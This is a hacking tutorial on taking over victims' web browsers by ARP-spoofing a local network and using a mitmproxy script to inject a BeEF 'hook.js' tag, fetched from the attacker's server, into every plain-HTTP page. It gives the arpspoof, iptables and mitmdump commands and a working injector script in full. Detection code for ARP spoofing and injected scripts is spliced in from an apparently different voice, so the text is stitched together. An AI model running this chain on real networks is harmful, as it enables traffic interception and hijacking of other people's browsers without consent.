Hacking browsers with BeEF and Man In The Middle Attack

In this article, I will demonstrate how the Browser Exploitation Framework (BeEF) can be used together with Man In The Middle Attack (MITM) to hack web browsers.


What is BeEF?

BeEF is an awesome penetration testing tool that is used to exploit browsers by first "hooking" them with a "hook.js" file. The idea is to make the victim open a web page in his browser that has this "hook.js" file embedded. This JavaScript file then connects back to the BeEF instance running on the hacker's machine, and the hooking is complete. The hacker can now control that particular web page and hence exploit the browser.


What is Man In The Middle Attack?

Man In The Middle Attack is where an attacker places himself between you and your router using a technique known as ARP spoofing.

By doing so, all your Internet traffic is routed through the attacker's machine (the "man in the middle") instead of your router. This gives the attacker an advantage because he/she can now see and even modify your Internet traffic (both incoming and outgoing) as they want. This is obviously only valid for websites that don't use a secure HTTPS connection. Since HTTPS provides authenticity and encryption, Man In The Middle Attack won't work on HTTPS websites.


Combining BeEF and Man In The Middle Attack

The idea is simple: we want to modify the Internet traffic of the victim such that before sending him/her the website responses, we inject the "hook.js" file into the response messages. In this way, BeEF can control all the websites that the victim is using in his browser.


Step 1. Install BeEF

BeEF comes pre-installed with Kali Linux, but if you want to install it manually you can do so,


sudo apt-get install beef-xss


Step 2. Run BeEF

You can start BeEF framework by typing this command


sudo beef-xss

This will start BeEF and serve a web interface at http://<IP>:3000/ui

Go to this URL, and login with the default credentials (username: beef, password: beef)


Now you can see the BeEF control panel


Step 3. Start the Man In The Middle Attack

In order to start the MITM attack, you first need to enable IP forwarding on your Kali Linux,


sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -A FORWARD --in-interface [iface] -j ACCEPT
sudo iptables -t nat -A PREROUTING -i [iface] -p tcp --dport 80 -j REDIRECT --to-port 8080

Replace [iface] with your interface in the above commands. You can find out your interface name by typing "ifconfig" in your terminal.


Next, you need to install the arpspoof utility.

sudo apt-get install dsniff

Then, start the ARP spoofing with the arpspoof utility.


In the first terminal, run

arpspoof -i [iface] -t [victim-ip] [gateway-ip]

The [victim-ip] should be the IP address of the victim, [gateway-ip] is the IP address of your router (you can find it out by typing in "ip route" in your terminal)


In your second terminal, run

arpspoof -i [iface] -t [gateway-ip] [victim-ip]
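Seen from the victim's side, the ARP spoofing described above leaves two traces in the local neighbour table: the gateway's IP suddenly maps to a different MAC than before, and one MAC answers for more than one IP. The following is an added example, not code from the article, BeEF or dsniff, that parses `ip neigh show` output and reports both indicators. The sample output, the addresses in it and the baseline gateway MAC are constructed for illustration; the `ip neigh show` line format is assumed to be the Linux iproute2 one.

```python
import re
import subprocess
from collections import defaultdict

# Constructed sample of `ip neigh show` output on a workstation while the
# gateway (192.168.1.1) is being ARP-spoofed: its entry now carries the same
# MAC as another LAN host (192.168.1.37). All addresses are invented.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:37 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.37 dev eth0 lladdr 00:11:22:33:44:37 REACHABLE
192.168.1.50 dev eth0 FAILED
"""

# Gateway MAC recorded earlier on a known-clean network (assumed baseline).
KNOWN_GATEWAY = ("192.168.1.1", "00:11:22:33:44:01")

NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9A-Fa-f:]{17})\s*(.*)$")


def parse_neigh(text):
    """Parse `ip neigh show` output into (ip, iface, mac, state) tuples.
    Lines without an lladdr (e.g. FAILED entries) are skipped."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            ip, iface, mac, state = m.groups()
            entries.append((ip, iface, mac.lower(), state.strip()))
    return entries


def find_arp_anomalies(entries, known_gateway):
    """Return human-readable findings for two ARP-spoofing indicators:
    one MAC answering for several IPs, and the gateway's MAC differing
    from the recorded baseline."""
    findings = []
    by_mac = defaultdict(list)
    for ip, _iface, mac, _state in entries:
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(f"MAC {mac} is claimed by multiple IPs: {', '.join(ips)}")
    gw_ip, gw_mac = known_gateway
    current = {ip: mac for ip, _iface, mac, _state in entries}
    if gw_ip in current and current[gw_ip] != gw_mac.lower():
        findings.append(
            f"gateway {gw_ip} MAC changed from {gw_mac.lower()} to {current[gw_ip]}")
    return findings


def check_live_neighbours(known_gateway):
    """Run the same check against the host's real neighbour table (Linux only)."""
    out = subprocess.run(["ip", "neigh", "show"], capture_output=True,
                         text=True, check=True).stdout
    return find_arp_anomalies(parse_neigh(out), known_gateway)


if __name__ == "__main__":
    for finding in find_arp_anomalies(parse_neigh(SAMPLE_NEIGH), KNOWN_GATEWAY):
        print("WARNING:", finding)
```

The duplicate-MAC heuristic has benign exceptions (a router legitimately answering for several addresses, for instance), so treat it as a prompt to investigate; the baseline comparison is the stronger signal. Static ARP entries for the gateway on critical hosts, and Dynamic ARP Inspection on managed switches, prevent the poisoning in the first place rather than merely detecting it.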

The Man In The Middle is now set up. All the victim's Internet traffic on port 80 is routed through our machine. But, in order to monitor or modify the traffic, we need to use a proxy tool. We'll be using a tool called "mitmproxy".


First, install it

sudo apt-get install mitmproxy
pip install mitmproxy

Before we start the proxy tool, we need to write a Python utility that will automatically inject the "hook.js" file into every response message captured by the proxy tool.

Here is the Python script that does it,

from bs4 import BeautifulSoup
from mitmproxy import http


class Injector:
    def load(self, loader):
        # Registers a command-line option for mitmproxy; its value is not used below
        loader.add_option(
            "script", str, "", "My Script Tag"
        )

    def response(self, flow: http.HTTPFlow) -> None:
        # Only touch HTML responses. Default to "" so that a response without a
        # Content-Type header does not raise AttributeError on None.
        content_type = flow.response.headers.get("content-type", "")
        if "text/html" in content_type:
            html = BeautifulSoup(flow.response.content, "html.parser")
            if html.head:
                # Insert the hook as the first child of <head>
                script = html.new_tag(
                    "script", id="mitmproxy", src="http://0.0.0.0:3000/hook.js",
                    type="application/javascript")
                html.head.insert(0, script)
                flow.response.content = str(html).encode("utf8")


addons = [Injector()]

Replace the IP address 0.0.0.0 with your IP address (where BeEF is running)
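From the defender's side, the injection above is visible in the HTML that reaches the browser: a script tag whose source points at a host that is not the page's own origin. The following is an added example, not code from the article, BeEF or mitmproxy, that walks a page's script tags with Python's standard library html.parser and reports sources loaded from foreign hosts; it generalises beyond "hook.js" to any externally injected script. The two sample pages, the hostname example.com, the address 192.0.2.10 and the CDN allowlist are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a page served from example.com as it would reach the
# browser after a transparent proxy inserted a hook tag at the top of <head>.
INJECTED_PAGE = """<html><head>
<script id="mitmproxy" src="http://192.0.2.10:3000/hook.js" type="application/javascript"></script>
<title>Shop</title><script src="/static/app.js"></script>
</head><body>hello</body></html>"""

# Constructed sample: the same page as the site actually serves it.
CLEAN_PAGE = """<html><head><title>Shop</title>
<script src="https://cdn.example.com/app.js"></script>
</head><body>hello</body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def script_sources(html):
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    return parser.srcs


def find_foreign_scripts(html, page_host, allowed_hosts=()):
    """Return script sources whose host is neither the page's own host nor on
    the allowlist. Relative URLs resolve to the page origin and are skipped.
    An injected hook shows up here as an absolute URL to an unexpected host."""
    foreign = []
    for src in script_sources(html):
        parts = urlparse(src)
        if not parts.netloc:
            continue
        host = (parts.hostname or "").lower()
        if host == page_host.lower() or host in {h.lower() for h in allowed_hosts}:
            continue
        foreign.append(src)
    return foreign


if __name__ == "__main__":
    for src in find_foreign_scripts(INJECTED_PAGE, "example.com", ("cdn.example.com",)):
        print("foreign script:", src)
```

A check like this belongs in a monitoring proxy or a synthetic-browsing job that fetches known pages over plain HTTP and compares what arrives with what the origin serves. It catches the symptom; the fix the article itself points to is serving every page over HTTPS, ideally with HSTS, so that a transparent proxy on the path cannot rewrite the response at all.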


Now, start the proxy tool by giving this Python script as input.

mitmdump --mode transparent -s js_injector.py

This will start the proxy tool, and for every response it captures, it will execute the Python script that is passed as input, which in turn will inject the "hook.js" file into the message.


That's it! Now, all the websites that work on plain HTTP are injected with the hook.js file and you can control all of them using BeEF control panel.

